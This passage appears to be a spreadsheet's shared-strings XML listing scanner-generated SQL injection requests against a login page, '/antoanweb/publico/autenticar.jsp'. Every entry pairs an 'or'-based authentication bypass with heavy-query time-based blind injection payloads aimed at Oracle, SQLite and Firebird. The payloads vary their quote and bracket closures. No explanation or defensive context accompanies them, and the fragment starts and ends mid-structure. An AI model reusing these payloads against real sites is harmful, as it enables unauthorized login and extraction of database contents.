    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(8484=8484</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((3788=3788</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(((5132=5132</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and('cvph'='cvph</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(('hhzq'='hhzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((('jall'='jall</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and'bsus'='bsus</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and('wlio'like'wlio</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(('mpbq'like'mpbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((('wmgl'like'wmgl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and'roxd'like'roxd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and("aded"="aded</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(("iosd"="iosd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((("frkj"="frkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and"uytk"="uytk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and("tlgu"like"tlgu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and(("qbpz"like"qbpz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and((("fppl"like"fppl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--and"fheo"like"fheo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(6837=6837</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((4336=4336</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(((959=959</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('kprm'='kprm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('osrf'='osrf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('yptv'='yptv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'gpuw'='gpuw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('qrmj'like'qrmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('qtyn'like'qtyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('qvsd'like'qvsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'gtzz'like'gtzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("jtpg"="jtpg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("zuyz"="zuyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("uwll"="uwll</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"fnbu"="fnbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("ahtt"like"ahtt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("qqec"like"qqec</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("vewg"like"vewg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6003=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"yszu"like"yszu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(4480=4480</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((7900=7900</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(((4541=4541</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and('xgqq'='xgqq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(('ahpk'='ahpk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((('xdjf'='xdjf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and'ovfk'='ovfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and('zqyz'like'zqyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(('nbrk'like'nbrk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((('nfyv'like'nfyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and'mpzv'like'mpzv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and("gsbo"="gsbo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(("wbuc"="wbuc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((("pmnq"="pmnq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and"gbzl"="gbzl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and("ncvn"like"ncvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and(("txtt"like"txtt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and((("esso"like"esso</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8045=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))--and"zhtj"like"zhtj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(8917=8917</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((9670=9670</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(((872=872</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('bqyd'='bqyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('lbvf'='lbvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('aukt'='aukt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'ypnd'='ypnd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('hcma'like'hcma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('jpti'like'jpti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('qjul'like'qjul</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'rvrg'like'rvrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("cveo"="cveo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("sswo"="sswo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("swwl"="swwl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"hoav"="hoav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("nnzm"like"nnzm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("xcta"like"xcta</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("cium"like"cium</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and165=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"totu"like"totu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(6481=6481</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((782=782</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(((2304=2304</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and('kfvr'='kfvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(('hdgz'='hdgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((('jbxh'='jbxh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and'cfjo'='cfjo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and('vumv'like'vumv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(('hpjv'like'hpjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((('xqlc'like'xqlc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and'txhd'like'txhd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and("kivr"="kivr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(("ttbz"="ttbz</t>
  </si>
  <si>
